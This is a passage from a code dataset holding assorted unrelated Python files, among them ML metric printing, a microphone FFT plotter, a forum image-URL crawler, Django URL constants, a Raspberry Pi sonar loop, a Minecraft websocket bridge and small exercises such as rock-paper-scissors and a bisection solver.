y_test_prob)\n plt.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % roc_auc)\n plt.plot([0, 1], [0, 1], 'k--') # coin toss line\n plt.xlabel('False Positive Rate', fontsize = 14)\n plt.ylabel('True Positive Rate', fontsize = 14)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.0])\n plt.legend(loc=\"lower right\")\n plt.show()\n print('Accuracy_train: %.4f\\t\\tAccuracy_test: %.4f' %\\\n (metrics.accuracy_score(y_train, y_train_pred),\\\n metrics.accuracy_score(y_test, y_test_pred)))\n print('Precision_test: %.4f\\t\\tRecall_test: %.4f' %\\\n (metrics.precision_score(y_test, y_test_pred),\\\n metrics.recall_score(y_test, y_test_pred)))\n print('ROC-AUC_test: %.4f\\t\\tF1_test: %.4f\\t\\tMCC_test: %.4f' %\\\n (roc_auc,\\\n metrics.f1_score(y_test, y_test_pred),\\\n metrics.matthews_corrcoef(y_test, y_test_pred)))\n return y_train_pred, y_test_prob, y_test_pred\n","sub_path":"Chapter6/mldatasets/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"194327094","text":"\"\"\"\nKel Kanhirun \npython v3.4.1\nJan. 22, 2015\n\n@description\nA (Python) solution to an example problem posed in Mastering Regular\nExpressions by Jeffrey Friedl.\n\n@notes\nAccording to Friedl, regexp is intertwined with logic which is evident for in\nthe pattern below.\n\nI learned...\n\n1. For the _example_ for 10.00, we can no longer return an object of type\n 'float' if we wish to satisfy the requirement. Therefore, I decided to use\n `decimal.Decimal` which can express '10.00' and is often used in dealing\n with financial transactions.\n\nI experimented with...\n1. expressing nested subexpressions in Lisp-style\n\"\"\"\n\nimport re\nfrom decimal import Decimal as D\n\n\ndef pp_stock_price(stock_price):\n result = match_stock_price(stock_price)\n\n return D(result) if result else None\n\n\ndef match_stock_price(string):\n pp_pattern = \"\"\"\n (\\d+\n (\\.\\d{2}[^0]?)?)\n \"\"\"\n match = re.match(pp_pattern, string, re.VERBOSE)\n\n return match.group() if match else None\n","sub_path":"Mastering Regular Expressions/pp_stock_price/pp_stock_price.py","file_name":"pp_stock_price.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"531438889","text":"import pyaudio\nimport numpy as np\nimport time\nfrom scipy.fftpack import fft, ifft\nfrom scipy.signal import lfilter\nimport matplotlib.pyplot as plt\n# import pyttsx3\nimport tkinter\nimport GUI\n\nCHUNK = 1024 # number of data points to read at a time\nRATE = 44100 # time resolution of the recording device (Hz)\n\np=pyaudio.PyAudio() # start the PyAudio class\nstream=p.open(format=pyaudio.paInt16,channels=1,rate=RATE,input=True,\n frames_per_buffer=CHUNK) #uses default input device\n\n# engine = pyttsx3.init()\n\n\n# create a numpy array holding a single read of audio data\noverall = np.array([0])\nconverted = np.array([0])\nma = -1\n#window = tkinter.Tk()\n#gui = GUI.GraphicalInterface(window)\n#window.mainloop()\nmaxes = []\nwhile(True):\n try:\n #parses data from microphone\n data = np.fromstring(stream.read(CHUNK), dtype=np.int16)\n #checks if its silent\n \"\"\"silent = False\n if max(data) == 1 or min(data) == -1:\n silent = True\n if silent:\n data = [0]\n\n if max(data) > ma:\n ma = max(data)\n print(len(overall))\"\"\"\n\n #removes oldest values\n overall = overall[CHUNK:]\n overall = np.append(overall, data)\n y = fft(overall)\n deci = 
10.*np.log10(abs(y))\n        filtered = lfilter([1.0 / 100] * 100, 1, deci )\n        ma = np.max(y)\n        # Number of samplepoints\n        N = 600\n        # sample spacing\n        T = 1.0 / 600.0\n        x = np.linspace(0.0, 1.0/( 2.0 *T), N//2)\n        #plt.plot(x, 2.0/N * np.abs(y[:N//2]))\n        plt.plot(filtered[:len(filtered)//2])\n        #v = plt.plot(overall)\n        #sets limits on the y axis\n        plt.ylim(0, 100)\n        #fig = plt.gcf()\n        #gui.add_plot(fig)\n        #v\n        #refresh rate\n        plt.pause(0.001)\n        #cleans each instance of the graph to make it continuous and smooth\n        plt.clf()\n        maxes.append(ma)\n\n    except: #closes the plot(s) when ctrl-c is done in the terminal\n        print(\"error\")\n        print(max(maxes))\n        break\n    print(ma)\n    plt.show()\n\n    # close the stream gracefully\n    stream.stop_stream()\n    stream.close()\n    p.terminate()\n    plt.close('all')\n\ndef get_current_figure():\n    return plt.gcf()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"311906048","text":"from xelo2.database import access_database, close_database\n\nfrom .paths import DB_ARGS\n\n\ndef test_open(qtbot):\n    db = access_database(**DB_ARGS)\n\n    n_tables = 31\n    assert len(db['db'].tables()) == n_tables\n    assert len(db['db'].tables()) == len(db['tables'])\n\n    close_database(db)\n","sub_path":"tests/test_01_database.py","file_name":"test_01_database.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292236984","text":"# coding: utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport re\nimport time\nimport datetime\n\nHostreferer = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36',\n\n}\n\nlocalBasicPath = \"C:\\\\Github\\\\CLTxtTest\\\\\"\ntxtPath = \"C:\\\\Github\\\\CLTxtTest\\\\\"\n\nbasicUrl = \"https://cl.bbbck.xyz\"\nstartPath = basicUrl + \"/thread0806.php?fid=16\"\n\nstopCount = 0\nmaxPage = 20\nminPage = 0\nnowPage = 0\n\n\ndef getMaxPage():\n    maxPagePath = \"SaveData.txt\"\n    file = open(maxPagePath)\n    max = file.read()\n    file.close()\n    return int(max)\n\n\ndef open_URL(url):\n    try:\n        # req = requests.get(url, headers=Hostreferer, stream=True, timeout=20, proxies=proxies)\n        req = requests.get(url, headers=Hostreferer, stream=True, timeout=30)\n        req.encoding = \"gbk\"\n        if req.status_code == 200:\n            return req\n    except Exception as e:\n        print(\"except\", e)\n        # for i in range(1, 10):\n        #     print('Request timed out, retry attempt %s' % i)\n        #     # req = requests.get(url, headers=Hostreferer, stream=True, timeout=20, proxies=proxies)\n        #     req = requests.get(url, headers=Hostreferer, stream=True, timeout=30)\n        #     req.encoding = \"gbk\"\n        #     if req.status_code == 200:\n        #         return req\n        time.sleep(50)\n        # # req = requests.get(url, headers=Hostreferer, stream=True, timeout=20, proxies=proxies)\n        req = requests.get(url, headers=Hostreferer, stream=True, timeout=30)\n        req.encoding = \"gbk\"\n        if req.status_code == 200:\n            return req\n\n\n# fetch the html of the listing page\ndef get_html(htmlUrl):\n    req = open_URL(htmlUrl)\n    html = \"\"\n    try:\n        html = req.text\n        req.close()\n    except Exception as e:\n        print(\"except\", e)\n        time.sleep(10)\n        req = open_URL(htmlUrl)\n        html = req.text\n    return html\n\n
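# Aside: open_URL/get_html above recover from a failed request by sleeping and trying
# again. A compact sketch of the same idea as a bounded retry loop; the URL and the
# retry/backoff numbers here are placeholders, not values from the original script.
import time
import requests

def fetch_with_retry(url, attempts=3, backoff=5, timeout=30):
    for attempt in range(1, attempts + 1):
        try:
            resp = requests.get(url, timeout=timeout)
            if resp.status_code == 200:
                return resp
        except requests.RequestException as exc:
            print('attempt %d failed: %s' % (attempt, exc))
        time.sleep(backoff)  # wait before the next try
    return None  # caller decides what to do when every attempt has failed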
def rename(name):\n    rstr = r'[\\/\\\\\\:\\*\\?\\<\\>\\|]'\n    new_name = re.sub(rstr, \"\", name)\n    return new_name\n\n\ndef saveTxt(name, dataList):\n    if \"\\\\\" in name:\n        print(name)\n        name = name.replace('\\\\', '')\n    try:\n        file = open(txtPath + name, 'w+')\n        for oneData in dataList:\n            file.write(oneData.replace(u'\\xa0', u'') + \"\\n\")\n    except Exception as e:\n        print(name)\n        print(\"except\", e)\n\n\ndef saveOneAlbumText(url, name, compareList):\n    new_name = rename(name)\n    # os.listdir(txtPath):\n    if new_name+\".txt\" not in compareList:\n        html = get_html(url)\n        soup = BeautifulSoup(html, 'html.parser')\n        # imgs = soup.findAll(\"input\", {\"type\": \"image\"})\n        imgs = soup.findAll(\"img\")\n        urlList = []\n        print(\"Page \" + str(nowPage + 1))\n        print(\"Album --\" + name + \"-- saving started\")\n        for i in range(0, len(imgs)):\n            urlList.append(imgs[i].get('data-src'))\n        saveTxt(new_name+\".txt\", urlList)\n        print(\"Album --\" + name + \"-- saved successfully\")\n        return 0\n    else:\n        print(new_name + \" already exists\")\n        return 1\n\n\ndef findAllAlbum(url):\n    req = open_URL(url)\n    soup = BeautifulSoup(req.text, 'html.parser')\n    albums = soup.find_all(\"td\", {\"class\": \"tal\"})\n    urlList = []\n    nameList = []\n    if nowPage == 0:\n        albums = albums[9:-1]\n    for album in albums:\n        nameList.append(album.h3.a.string)\n        urlList.append(basicUrl+\"/\"+album.h3.a.get('href'))\n    return urlList, nameList\n\ndef save_one_page(url, compareList):\n\n    results = findAllAlbum(url)\n    urls = results[0]\n    names = results[1]\n    allURLLists = 0\n    for i in range(0, len(urls)):\n        allURLLists += saveOneAlbumText(urls[i], names[i], compareList)\n        time.sleep(0.1)\n    print(\"====================\")\n    print(allURLLists)\n    print(len(urls))\n    print(\"====================\")\n    if allURLLists == len(urls):\n        print(\"Reached a page that is already fully downloaded\")\n        return True\n    else:\n        return False\n\ndef saveData():\n    file = open(\"SaveData.txt\", 'w+')\n    file.write(str(nowPage))\n\n\ndef canCreateNewFolder(path):\n    if str(datetime.date.today()) not in os.listdir(path):\n        return True\n    else:\n        return False\n\n\ndef getAllFileFromOneFolder(path):\n    fileList = os.listdir(path)\n    return fileList\n\n\ndef getAllfile(path):\n    folderList = os.listdir(path)\n    compareList = []\n    for folderName in folderList:\n        fileList = getAllFileFromOneFolder(localBasicPath + folderName)\n        compareList += fileList\n    return compareList\n\n\nif __name__ == '__main__':\n    compareList = getAllfile(localBasicPath)\n    if canCreateNewFolder(txtPath):\n        txtPath += str(datetime.date.today()) + \"\\\\\"\n        os.mkdir(txtPath)\n        try:\n            stopCount = maxPage\n            for count in range(minPage, maxPage):\n                stopCount = count + 1\n                nowPage = count\n                url = startPath + \"&search=&page=\" + str(count + 1)\n                if save_one_page(url, compareList):\n                    break\n        except Exception as e:\n            print(\"Crawling finished\")\n            print(\"Stopped at page \" + str(stopCount))\n            # saveData()\n            # os.system(\"shutdown -s -t 10\")\n        print(\"Download complete\")\n    else:\n        print(str(datetime.date.today()) + \" folder already exists\")\n\n\n","sub_path":"CLURLTest.py","file_name":"CLURLTest.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308276668","text":"from django.utils.translation import ugettext_lazy as _\n\nfrom base import conf\n\nADMINISTRATOR_PREFIX = \"ADMINISTRATOR\"\n\n\nADMINISTRATOR_LIST_URL_NAME = ADMINISTRATOR_PREFIX + conf.LIST_SUFFIX\nADMINISTRATOR_CREATE_URL_NAME = ADMINISTRATOR_PREFIX + conf.CREATE_SUFFIX\nADMINISTRATOR_DETAIL_URL_NAME = ADMINISTRATOR_PREFIX + conf.DETAIL_SUFFIX\nADMINISTRATOR_UPDATE_URL_NAME = ADMINISTRATOR_PREFIX + conf.UPDATE_SUFFIX\nADMINISTRATOR_DELETE_URL_NAME = ADMINISTRATOR_PREFIX + conf.DELETE_SUFFIX\n\nSPECIALIST_PREFIX = \"SPECIALIST\"\n\n\nSPECIALIST_LIST_URL_NAME = SPECIALIST_PREFIX + 
conf.LIST_SUFFIX\nSPECIALIST_CREATE_URL_NAME = SPECIALIST_PREFIX + conf.CREATE_SUFFIX\nSPECIALIST_DETAIL_URL_NAME = SPECIALIST_PREFIX + conf.DETAIL_SUFFIX\nSPECIALIST_UPDATE_URL_NAME = SPECIALIST_PREFIX + conf.UPDATE_SUFFIX\nSPECIALIST_DELETE_URL_NAME = SPECIALIST_PREFIX + conf.DELETE_SUFFIX\nSPECIALIST_WITH_PATIENTS_URL_NAME = SPECIALIST_PREFIX + \"_with_patients\"\n\nPATIENT_PREFIX = \"PATIENT\"\n\n\nPATIENT_LIST_URL_NAME = PATIENT_PREFIX + conf.LIST_SUFFIX\nPATIENT_CREATE_URL_NAME = PATIENT_PREFIX + conf.CREATE_SUFFIX\nPATIENT_DETAIL_URL_NAME = PATIENT_PREFIX + conf.DETAIL_SUFFIX\nPATIENT_UPDATE_URL_NAME = PATIENT_PREFIX + conf.UPDATE_SUFFIX\nPATIENT_DELETE_URL_NAME = PATIENT_PREFIX + conf.DELETE_SUFFIX\nPATIENT_ADD_PROCEDURE_URL_NAME = PATIENT_PREFIX + \"_add_procedure\"\n\nMACHINE_PREFIX = \"MACHINE\"\n\n\nMACHINE_LIST_URL_NAME = MACHINE_PREFIX + conf.LIST_SUFFIX\nMACHINE_CREATE_URL_NAME = MACHINE_PREFIX + conf.CREATE_SUFFIX\nMACHINE_DETAIL_URL_NAME = MACHINE_PREFIX + conf.DETAIL_SUFFIX\nMACHINE_UPDATE_URL_NAME = MACHINE_PREFIX + conf.UPDATE_SUFFIX\nMACHINE_DELETE_URL_NAME = MACHINE_PREFIX + conf.DELETE_SUFFIX\n\nTREATMENT_PREFIX = \"TREATMENT\"\n\n\nTREATMENT_LIST_URL_NAME = TREATMENT_PREFIX + conf.LIST_SUFFIX\nTREATMENT_CREATE_URL_NAME = TREATMENT_PREFIX + conf.CREATE_SUFFIX\nTREATMENT_DETAIL_URL_NAME = TREATMENT_PREFIX + conf.DETAIL_SUFFIX\nTREATMENT_UPDATE_URL_NAME = TREATMENT_PREFIX + conf.UPDATE_SUFFIX\nTREATMENT_DELETE_URL_NAME = TREATMENT_PREFIX + conf.DELETE_SUFFIX\n\nPROCEDURE_PREFIX = \"PROCEDURE\"\n\n\nPROCEDURE_LIST_URL_NAME = PROCEDURE_PREFIX + conf.LIST_SUFFIX\nPROCEDURE_CREATE_URL_NAME = PROCEDURE_PREFIX + conf.CREATE_SUFFIX\nPROCEDURE_DETAIL_URL_NAME = PROCEDURE_PREFIX + conf.DETAIL_SUFFIX\nPROCEDURE_UPDATE_URL_NAME = PROCEDURE_PREFIX + conf.UPDATE_SUFFIX\nPROCEDURE_DELETE_URL_NAME = PROCEDURE_PREFIX + conf.DELETE_SUFFIX\nPROCEDURE_ACTIVATE_MACHINE_URL_NAME = PROCEDURE_PREFIX + \"_activate_machine\"\n\nMACHINEINSTANCE_PREFIX = \"MACHINEINSTANCE\"\n\n\nMACHINEINSTANCE_LIST_URL_NAME = MACHINEINSTANCE_PREFIX + conf.LIST_SUFFIX\nMACHINEINSTANCE_CREATE_URL_NAME = MACHINEINSTANCE_PREFIX + conf.CREATE_SUFFIX\nMACHINEINSTANCE_DETAIL_URL_NAME = MACHINEINSTANCE_PREFIX + conf.DETAIL_SUFFIX\nMACHINEINSTANCE_UPDATE_URL_NAME = MACHINEINSTANCE_PREFIX + conf.UPDATE_SUFFIX\nMACHINEINSTANCE_DELETE_URL_NAME = MACHINEINSTANCE_PREFIX + conf.DELETE_SUFFIX\n\nMACHINEINSTANCE_ACTIVATED_MESSAGE = _(\"Machine activated successfully\")\nMACHINEINSTANCE_UNACTIVATED_MESSAGE = _(\"Machine can't be activated at this moment\")\n\nMACHINEINPUT_PREFIX = \"MACHINEINPUT\"\n\n\nMACHINEINPUT_LIST_URL_NAME = MACHINEINPUT_PREFIX + conf.LIST_SUFFIX\nMACHINEINPUT_CREATE_URL_NAME = MACHINEINPUT_PREFIX + conf.CREATE_SUFFIX\nMACHINEINPUT_DETAIL_URL_NAME = MACHINEINPUT_PREFIX + conf.DETAIL_SUFFIX\nMACHINEINPUT_UPDATE_URL_NAME = MACHINEINPUT_PREFIX + conf.UPDATE_SUFFIX\nMACHINEINPUT_DELETE_URL_NAME = MACHINEINPUT_PREFIX + conf.DELETE_SUFFIX\n\n\n\nSECRETARY_PREFIX = \"SECRETARY\"\n\n\nSECRETARY_LIST_URL_NAME = SECRETARY_PREFIX + conf.LIST_SUFFIX\nSECRETARY_CREATE_URL_NAME = SECRETARY_PREFIX + conf.CREATE_SUFFIX\nSECRETARY_DETAIL_URL_NAME = SECRETARY_PREFIX + conf.DETAIL_SUFFIX\nSECRETARY_UPDATE_URL_NAME = SECRETARY_PREFIX + conf.UPDATE_SUFFIX\nSECRETARY_DELETE_URL_NAME = SECRETARY_PREFIX + conf.DELETE_SUFFIX\n\n","sub_path":"applications/core/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
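# Aside: conf.py above repeats the same five-suffix block for every model prefix. One
# hypothetical way to collapse that repetition; make_url_names and its return shape are
# inventions for illustration, not part of the project.
def make_url_names(prefix, conf):
    suffixes = ('LIST', 'CREATE', 'DETAIL', 'UPDATE', 'DELETE')
    # e.g. make_url_names('PATIENT', conf)['LIST'] == PATIENT_LIST_URL_NAME
    return {s: prefix + getattr(conf, s + '_SUFFIX') for s in suffixes}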
+{"seq_id":"203518012","text":"#!/usr/bin/env python\n\"\"\"\n_AddRunLumi_\n\nMySQL implementation of AddRunLumi\n\"\"\"\n\nfrom builtins import str, bytes\n\nfrom Utils.IteratorTools import grouper\nfrom WMCore.Database.DBFormatter import DBFormatter\n\n\nclass AddRunLumi(DBFormatter):\n sql = \"\"\"insert dbsbuffer_file_runlumi_map (filename, run, lumi, num_events)\n select id, :run, :lumi, :num_events from dbsbuffer_file\n where lfn = :lfn\"\"\"\n\n def getBinds(self, filename=None, runs=None):\n\n binds = []\n\n if isinstance(filename, list):\n for entry in filename:\n binds.extend(self.getBinds(filename=entry['lfn'], runs=entry['runs']))\n return binds\n\n if isinstance(filename, (str, bytes)):\n lfn = filename\n elif isinstance(filename, dict):\n lfn = filename('lfn')\n else:\n raise Exception(\"Type of filename argument is not allowed: %s\" \\\n % type(filename))\n\n if isinstance(runs, set):\n for run in runs:\n for lumi in run:\n binds.append({'lfn': lfn,\n 'run': run.run,\n 'lumi': lumi,\n 'num_events': run.getEventsByLumi(lumi)})\n else:\n raise Exception(\"Type of runs argument is not allowed: %s\" \\\n % type(runs))\n return binds\n\n def format(self, result):\n return True\n\n def execute(self, file=None, runs=None, conn=None, transaction=False):\n for sliceBinds in grouper(self.getBinds(file, runs), 10000):\n result = self.dbi.processData(self.sql, sliceBinds, conn=conn,\n transaction=transaction)\n return self.format(result)\n","sub_path":"src/python/WMComponent/DBS3Buffer/MySQL/DBSBufferFiles/AddRunLumi.py","file_name":"AddRunLumi.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"536039847","text":"import argparse\nimport glob\n\nimport pandas as pd\nimport torch\nfrom torchvision.transforms import transforms as T\nfrom tqdm import tqdm\n\nfrom inpainting.evaluate import evaluate_tracking, save_stats, save_results\nfrom inpainting.load import VideoDataset, DynamicMaskVideoDataset\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--output-masks-dir', type=str, default='results/demo/Tracker/OutputMasks')\nparser.add_argument('--target-masks-dir', type=str, default='data/processed/demo/Masks')\nparser.add_argument('--results-dir', type=str, default='results/demo/Tracker')\nopt = parser.parse_args()\n\n\noutput_masks_dataset = VideoDataset(\n list(glob.glob(f'{opt.output_masks_dir}/*')),\n 'mask'\n)\ntarget_masks_dataset = VideoDataset(\n list(glob.glob(f'{opt.target_masks_dir}/*')),\n 'mask'\n)\ndataset = DynamicMaskVideoDataset(output_masks_dataset, target_masks_dataset, transform=T.ToTensor())\n\nwith torch.no_grad():\n sample_dfs = []\n for i, (output_masks, target_masks) in enumerate(tqdm(dataset)):\n sample_df = evaluate_tracking(target_masks, output_masks)\n save_stats(sample_df.drop(columns=['t']), f'{opt.results_dir}/Misc/{i:05d}')\n sample_df['video'] = i\n sample_dfs.append(sample_df)\n\n df = pd.concat(sample_dfs)\n save_results(df, f'{opt.results_dir}')\n save_stats(df.drop(columns=['video', 't']), f'{opt.results_dir}')\n","sub_path":"scripts/evaluate_tracker.py","file_name":"evaluate_tracker.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"420195878","text":"import random\n\nprint(\" \")\nprint(\"Rock, Paper, Scissors\")\n\ndef whoWon (c, u):\n if c.lower() == u:\n print(f\"Both players chose {c}. 
It's a tie!\")\n\n elif u == 'r':\n if c == \"S\":\n print(\"Rock smashes scissors. You Win!\")\n else:\n print(\"Paper covers rock. You lose!\")\n\n elif u == 'p':\n if c == 'R':\n print(\"Paper covers rock. You win!\")\n else:\n print(\"Scissors cut paper. You lose!\")\n\n elif u == 's':\n if c == 'P':\n print(\"Scissors cut paper.You win!\")\n else:\n print(\"Rock smashes scissors. You lose!\")\n\n\nwhile True:\n\n uAct = input(\"Enter a choice, Rock (r), Paper (p) or Scissors (s)? \")\n uAct = uAct.lower()\n\n PosCoAct = ['R', 'P', 'S']\n cAct = random.choice(PosCoAct)\n \n\n print(f\"You chose {uAct} and the computer chose {cAct}. \\n\")\n\n whoWon(cAct, uAct)\n\n pAg = input(\"Do you want to play again (Y/N)? \")\n if pAg.lower() == \"n\":\n print(\"Thank you for playing!\")\n break","sub_path":"Python Project 3.py","file_name":"Python Project 3.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"368729942","text":"import json\nimport logging\n\nimport websockets\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\n\nfrom bot.worker.base import BaseWorker\n\n\nclass MinecraftWorker(BaseWorker):\n\n def __init__(self, app):\n self.app = app\n self.uri = app.config.get('minecraft', {}).get('uri', 'ws://localhost:8090')\n self.running = True\n self.ws = None\n\n async def process_message(self, message):\n msg = {}\n try:\n msg = json.loads(message)\n except:\n logging.info('got welcome msg')\n return\n\n if msg.get('type') == 'message':\n message_text = msg.get('data', {}).get('text')\n message_author = msg.get('data', {}).get('author')\n await self.app.telegram_worker.send_notification(f'{message_author}: {message_text}')\n elif msg.get('type') == 'webmap':\n message_text = msg.get('data', {}).get('text')\n await self.app.telegram_worker.send_notification(message_text)\n\n async def send_message(self, name, text):\n msg = {\n 'type': 'message',\n 'data': {\n 'text': text,\n 'author': name,\n }\n }\n\n json_msg = json.dumps(msg)\n await self.ws.send(json_msg)\n\n async def run(self):\n try:\n async with websockets.connect(self.uri) as websocket:\n self.ws = websocket\n while self.running:\n message = await websocket.recv()\n await self.process_message(message)\n except websockets.WebSocketException as e:\n logging.error(e)\n exit(1)\n except Exception as e:\n logging.error(e)\n exit(1)\n\n async def stop(self):\n pass\n","sub_path":"bot/worker/minecraft.py","file_name":"minecraft.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19350311","text":"import RPi.GPIO as GPIO \nimport time\n\n#Setup:\nGPIO.setwarnings(False) #*Since will run a while loop -> Will be in a while loop so im resetting all warnigns\nGPIO.cleanup() #*Since will run a while loop -> Need to add this so pins are fully cleaned up. Need to cean up so that i cant damage board if i accedintaly connect a HIGH port to GROUND. 
+{"seq_id":"19350311","text":"import RPi.GPIO as GPIO \nimport time\n\n#Setup:\nGPIO.setwarnings(False) #*Since we will run a while loop, I'm resetting all warnings\nGPIO.cleanup() #*Since we will run a while loop, clean up fully so I can't damage the board if I accidentally connect a HIGH port to GROUND. This ensures all pins are inputs (so they can't cause damage!)\nGPIO.setmode(GPIO.BCM)\n\nTRIG_pin = 4\nECHO_pin = 18\nGPIO.setup(TRIG_pin, GPIO.OUT)\nGPIO.setup(ECHO_pin, GPIO.IN)\n\ndef get_distance():\n    #Send out the wave for a moment:\n    GPIO.output(TRIG_pin, True) \n    time.sleep(.001) \n    GPIO.output(TRIG_pin, False) \n    #Get the wave and calculate the distance by using the time the wave was in the air:\n    while GPIO.input(ECHO_pin) == False:\n        start = time.time()\n    while GPIO.input(ECHO_pin) == True: \n        end = time.time()\n    sig_time = end - start \n    distance_cm = sig_time / 0.000058 \n    distance_in = sig_time / 0.000148 \n    #Ending Stuff:\n    print('Distance: {} cm'.format(distance_cm))\n    return distance_cm\n    #GPIO.cleanup() - removing this because if we cleanup after every loop, the pin definitions will be gone\n\nwhile True:\n    distance = get_distance()\n    time.sleep(.05)\n\n\n\n\n\n\n","sub_path":"RaspberryPi_Tutorials/sonar_RunConstantly.py","file_name":"sonar_RunConstantly.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"88701622","text":"import sys\nimport os\nimport calendar\nimport datetime\nmonth_list = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\ndef is_leap(year):\n    return year%4 == 0 and (year%100 !=0 or year%400 ==0)\n\ndef month_day(year, month):\n    if not 1 <= month <= 12:\n        # if 1 <= month and month >= 12:\n        return \"Invalid month\"\n\n    if month == 2 and is_leap(year): \n        return 29\n\n    return month_list[month]\n\n# s = raw_input(\"Enter raw:\")\n# #print(\"s\",s)\n# print(dir(s))\n\n# print(month_day(2020, 0))\n# print(sys.path)\n# datew =\"\"\ndat = datetime.datetime.today()\nprint(\"Date:\",dat)\nsentence = 'Date: {0:%Y%d}'.format(dat)\nprint(sentence)\n# date = datetime.datetime(dat)\n# date.strftime('%m%d%y')\nprint(\"DATE TIME APPEND:\",datetime.datetime.today().strftime('%B,%Y%d%m'))\nprint(calendar.isleap(2019))\npath = os.getcwd()\npath1 = \"\\welome\\one.py\"\nprint(\"Path\", path)\nprint(\"Path1\", path1)\npaths = os.path.join(os.getcwd(), \"test.txt\")\nprint(os.listdir())\nprint(paths)\nprint(os.__file__)\nprint(\"Home:\",os.environ.get('HOME'))\n\n# print(month_day(2020, 2))\n\n# list = [1,2,3,4]\n# lists =[11,12,13,14]\n# list[2] = 4 \n# print(list)\n# list.remove(4)\n# print(list)\n# print(type(list))\n\n# tuple = (1,2,3,4,5)\n# tuples = (11,12,13,14)\n# tupless= tuple + tuples\n# print(tupless)\n\n\n# a = 'test'\n# b = 'tests'\n# print(a is b)\n\nx = \"global x\"\n\ndef outer():\n\tglobal x\n\tx = \"outer x\"\n\n\tdef inner():\n\t\t# global x\n\t\tx =\"inner x\"\n\t\tprint(x)\n\n\tinner()\n\tprint(x)\n\nouter()\nprint(x)","sub_path":"Leap_Year.py","file_name":"Leap_Year.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"542850985","text":"import math\n\n# finds x: x = cos(x)\n# use binary search!\ndef solve_equation():\n    left, right = -100, 100\n    epsilon = 10 ** (-7)\n    while left <= right - epsilon:\n        middle = (left + right) / 2\n        y = middle - math.cos(middle) #our function\n        if y < 0:\n            left = middle\n        else:\n            right = middle\n    return middle\n\nx = solve_equation()\nprint(x, math.cos(x), abs(x - math.cos(x)))","sub_path":"algos&structures/21-09-2016/equation.py","file_name":"equation.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"329303555","text":"#!/usr/bin/env 
python3\n\"\"\"\nconvert Gemini3D old raw binary neutral data to HDF5 .h5\nrequires \"simsize.dat\" file to be present in the same directory at the neutral .dat files\n\"\"\"\n\nimport typing\nfrom pathlib import Path\nimport argparse\nimport h5py\n\nimport gemini3d.raw.read as raw_read\n\nimport gemini3d.write as write\n\np = argparse.ArgumentParser()\np.add_argument(\"indir\", help=\"Gemini .dat file directory\")\np.add_argument(\"outdir\", help=\"directory to write HDF5 files\")\nP = p.parse_args()\n\nindir = Path(P.indir).expanduser()\noutdir = Path(P.outdir).expanduser()\n\ninfiles: typing.Iterable[Path]\nif indir.is_file():\n infiles = [indir]\n indir = indir.parent\nelif indir.is_dir():\n infiles = indir.glob(\"*.dat\")\nelse:\n raise FileNotFoundError(indir)\n\noutdir.mkdir(parents=True, exist_ok=True)\n\n# %% convert simsize\nlx = raw_read.simsize(indir)\nprint(f\"{indir} lx:\", lx)\nwith h5py.File(outdir / \"simsize.h5\", \"w\") as f:\n f[\"lx1\"] = lx[0]\n f[\"lx2\"] = lx[1]\n# %% convert data\ni = 0\nfor infile in infiles:\n if infile.stem in {\"simsize\", \"simgrid\", \"initial_conditions\"}:\n continue\n\n outfile = outdir / (f\"{infile.stem}.h5\")\n print(infile, \"=>\", outfile)\n i += 1\n\n dat = raw_read.neutral2(infile)\n\n dat[\"dn0all\"] = dat[\"dn0all\"].transpose()\n dat[\"dnN2all\"] = dat[\"dnN2all\"].transpose()\n dat[\"dnO2all\"] = dat[\"dnO2all\"].transpose()\n dat[\"dvnrhoall\"] = dat[\"dvnrhoall\"].transpose()\n dat[\"dvnzall\"] = dat[\"dvnzall\"].transpose()\n dat[\"dTnall\"] = dat[\"dTnall\"].transpose()\n\n write.neutral2(dat, outfile)\n\nif i == 0:\n raise FileNotFoundError(f\"no .dat files found in {indir}\")\n\nprint(f\"DONE: converted {i} files in {indir} to {outdir}\")\n","sub_path":"scripts/convert_neutral.py","file_name":"convert_neutral.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"548231566","text":"from __future__ import unicode_literals, print_function, division\nfrom veil.profile.installer import *\nfrom .redis_setting import redis_program\n\n\ndef queue_program(host, 